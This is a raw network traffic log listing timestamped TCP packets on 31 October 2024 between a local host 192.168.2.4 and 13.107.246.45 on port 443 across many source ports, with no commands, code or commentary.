Oct 31, 2024 19:20:49.993158102 CET	443	51504	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.993220091 CET	443	51504	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.993288040 CET	51504	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.993556976 CET	51504	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.993568897 CET	443	51504	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:49.993580103 CET	51504	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:49.993585110 CET	443	51504	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.002887011 CET	443	51505	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.003616095 CET	443	51505	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.003676891 CET	51505	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.003725052 CET	51505	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.003739119 CET	443	51505	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.003755093 CET	51505	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.003761053 CET	443	51505	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.003896952 CET	443	51503	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.003915071 CET	443	51503	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.003976107 CET	443	51503	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.004019022 CET	51503	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.004019976 CET	51503	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.004395008 CET	51508	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.004432917 CET	443	51508	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.004539967 CET	51508	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.005176067 CET	51503	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.005176067 CET	51503	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.005197048 CET	443	51503	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.005206108 CET	443	51503	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.006290913 CET	51508	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.006302118 CET	443	51508	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.006864071 CET	51509	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.006891012 CET	443	51509	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.007333994 CET	51510	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.007333994 CET	51509	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.007333994 CET	51509	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.007344961 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.007375956 CET	443	51509	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.007515907 CET	51510	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.007715940 CET	51510	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.007724047 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.009490967 CET	443	51507	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.009843111 CET	51507	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.009855986 CET	443	51507	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.010282040 CET	51507	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.010288000 CET	443	51507	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.070466995 CET	443	51506	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.070676088 CET	443	51506	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.070723057 CET	51506	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.070791960 CET	51506	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.070801973 CET	443	51506	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.070813894 CET	51506	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.070826054 CET	443	51506	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.073973894 CET	51511	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.074021101 CET	443	51511	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.074126959 CET	51511	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.074351072 CET	51511	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.074368000 CET	443	51511	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.308109045 CET	443	51507	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.308161020 CET	443	51507	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.308243036 CET	51507	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.308593988 CET	51507	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.308617115 CET	443	51507	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.308629990 CET	51507	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.308635950 CET	443	51507	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.311351061 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.311404943 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.311470985 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.311650991 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.311667919 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.727472067 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.728032112 CET	51510	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.728049040 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.728512049 CET	51510	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.728518963 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.737092972 CET	443	51509	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.737916946 CET	443	51508	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.738092899 CET	51509	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.738107920 CET	443	51509	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.738198996 CET	51508	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.738209009 CET	443	51508	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.738539934 CET	51509	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.738545895 CET	443	51509	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.738614082 CET	51508	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.738619089 CET	443	51508	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.868415117 CET	443	51509	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.868447065 CET	443	51509	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.868500948 CET	443	51509	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.868520975 CET	51509	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.868546009 CET	51509	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.868588924 CET	443	51508	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.868613005 CET	443	51508	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.868658066 CET	51508	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.868665934 CET	443	51508	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.868707895 CET	51508	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.868891954 CET	51508	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.868907928 CET	443	51508	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.868967056 CET	51509	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.868983030 CET	443	51509	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.868987083 CET	51508	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.868997097 CET	443	51508	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.869003057 CET	51509	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.869019032 CET	443	51509	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.872035027 CET	51513	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.872070074 CET	443	51513	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.872145891 CET	51513	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.873307943 CET	51514	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.873337030 CET	443	51514	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.873404026 CET	51514	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.873475075 CET	51513	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.873495102 CET	443	51513	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.874129057 CET	51514	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.874142885 CET	443	51514	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.969872952 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.969902039 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.969923973 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.970052004 CET	51510	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.970067024 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.970105886 CET	51510	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.970105886 CET	51510	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.970563889 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.970637083 CET	51510	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.970650911 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.970662117 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.970706940 CET	51510	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.970722914 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.970736027 CET	51510	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.970736027 CET	51510	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.970742941 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.970750093 CET	443	51510	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.974004984 CET	51515	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.974061966 CET	443	51515	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:50.974138975 CET	51515	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.974299908 CET	51515	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:50.974322081 CET	443	51515	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.039433002 CET	443	51511	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.039980888 CET	51511	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.039993048 CET	443	51511	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.040498018 CET	51511	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.040504932 CET	443	51511	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.054491043 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.054985046 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.055022001 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.055515051 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.055521965 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.172549963 CET	443	51511	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.172606945 CET	443	51511	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.172732115 CET	51511	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.172746897 CET	443	51511	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.172794104 CET	443	51511	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.172862053 CET	51511	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.173127890 CET	51511	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.173129082 CET	51511	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.173151970 CET	443	51511	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.173161030 CET	443	51511	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.176192999 CET	51516	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.176244020 CET	443	51516	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.176323891 CET	51516	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.176500082 CET	51516	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.176507950 CET	443	51516	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.306668997 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.306699038 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.306723118 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.306788921 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.306818008 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.306833982 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.306869030 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.426347017 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.426383018 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.426440001 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.426470995 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.426487923 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.426490068 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.426515102 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.426544905 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.426738977 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.426754951 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.426784039 CET	51512	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.426789999 CET	443	51512	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.430074930 CET	51517	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.430121899 CET	443	51517	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.430188894 CET	51517	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.430363894 CET	51517	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.430380106 CET	443	51517	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.607423067 CET	443	51513	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.607992887 CET	51513	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.608021975 CET	443	51513	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.608496904 CET	51513	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.608504057 CET	443	51513	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.618550062 CET	443	51514	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.618912935 CET	51514	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.618949890 CET	443	51514	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.619318008 CET	51514	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.619323969 CET	443	51514	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.728018045 CET	443	51515	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.728657007 CET	51515	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.728693962 CET	443	51515	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.729146004 CET	51515	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.729152918 CET	443	51515	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.736763954 CET	443	51513	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.736785889 CET	443	51513	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.736840963 CET	443	51513	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.736844063 CET	51513	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.736897945 CET	51513	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.737107992 CET	51513	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.737127066 CET	443	51513	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.737138987 CET	51513	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.737143993 CET	443	51513	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.740242004 CET	51518	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.740278006 CET	443	51518	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.740356922 CET	51518	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.740509987 CET	51518	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.740523100 CET	443	51518	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.752126932 CET	443	51514	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.752156019 CET	443	51514	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.752213955 CET	443	51514	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.752226114 CET	51514	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.752260923 CET	51514	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.752434015 CET	51514	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.752450943 CET	443	51514	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.752466917 CET	51514	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.752473116 CET	443	51514	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.754720926 CET	51519	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.754755974 CET	443	51519	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.754832029 CET	51519	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.754959106 CET	51519	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.754973888 CET	443	51519	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.860848904 CET	443	51515	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.860929966 CET	443	51515	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.860985041 CET	51515	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.861177921 CET	51515	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.861200094 CET	443	51515	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.861217022 CET	51515	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.861223936 CET	443	51515	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.864377022 CET	51520	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.864413977 CET	443	51520	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.864484072 CET	51520	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.864690065 CET	51520	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.864705086 CET	443	51520	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.919859886 CET	443	51516	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.920469046 CET	51516	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.920500994 CET	443	51516	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:51.920965910 CET	51516	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:51.920972109 CET	443	51516	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.051614046 CET	443	51516	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.051721096 CET	443	51516	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.051780939 CET	51516	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.052179098 CET	51516	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.052194118 CET	443	51516	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.052215099 CET	51516	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.052227020 CET	443	51516	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.056016922 CET	51521	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.056046009 CET	443	51521	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.056109905 CET	51521	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.058697939 CET	51521	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.058710098 CET	443	51521	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.158658981 CET	443	51517	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.159400940 CET	51517	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.159423113 CET	443	51517	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.159884930 CET	51517	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.159890890 CET	443	51517	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.296722889 CET	443	51517	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.297130108 CET	443	51517	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.297205925 CET	51517	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.297324896 CET	51517	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.297347069 CET	443	51517	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.297363043 CET	51517	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.297369957 CET	443	51517	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.300549984 CET	51522	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.300574064 CET	443	51522	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.300638914 CET	51522	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.300786018 CET	51522	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.300801992 CET	443	51522	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.502476931 CET	443	51518	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.503118038 CET	51518	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.503140926 CET	443	51518	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.503669024 CET	51518	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.503680944 CET	443	51518	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.520891905 CET	443	51519	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.521277905 CET	51519	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.521300077 CET	443	51519	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.521888018 CET	51519	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.521892071 CET	443	51519	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.615036011 CET	443	51520	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.615509987 CET	51520	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.615549088 CET	443	51520	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.615992069 CET	51520	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.615997076 CET	443	51520	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.634206057 CET	443	51518	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.634279013 CET	443	51518	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.634377003 CET	51518	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.634598017 CET	51518	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.634610891 CET	443	51518	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.634622097 CET	51518	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.634627104 CET	443	51518	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.637310028 CET	51523	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.637320042 CET	443	51523	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.637389898 CET	51523	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.637515068 CET	51523	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.637526035 CET	443	51523	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.656306982 CET	443	51519	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.656337023 CET	443	51519	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.656379938 CET	443	51519	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.656400919 CET	51519	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.656430006 CET	51519	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.656559944 CET	51519	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.656579018 CET	443	51519	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.656589985 CET	51519	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.656594992 CET	443	51519	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.750461102 CET	443	51520	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.750531912 CET	443	51520	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.750591993 CET	51520	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.750778913 CET	51520	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.750801086 CET	443	51520	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.750813961 CET	51520	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.750819921 CET	443	51520	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.796027899 CET	443	51521	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.796523094 CET	51521	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.796550035 CET	443	51521	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.796991110 CET	51521	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.796998024 CET	443	51521	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.928909063 CET	443	51521	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.928980112 CET	443	51521	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.929110050 CET	51521	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.929337025 CET	51521	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.929352999 CET	443	51521	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:52.929364920 CET	51521	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:52.929371119 CET	443	51521	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:53.040751934 CET	443	51522	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:53.041299105 CET	51522	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:53.041331053 CET	443	51522	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:53.041862965 CET	51522	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:53.041871071 CET	443	51522	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:53.176641941 CET	443	51522	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:53.177362919 CET	443	51522	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:53.177433968 CET	51522	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:53.179965973 CET	51522	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:53.179991007 CET	443	51522	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:53.180002928 CET	51522	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:53.180010080 CET	443	51522	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:53.382334948 CET	443	51523	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:53.382843018 CET	51523	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:53.382858038 CET	443	51523	13.107.246.45	192.168.2.4
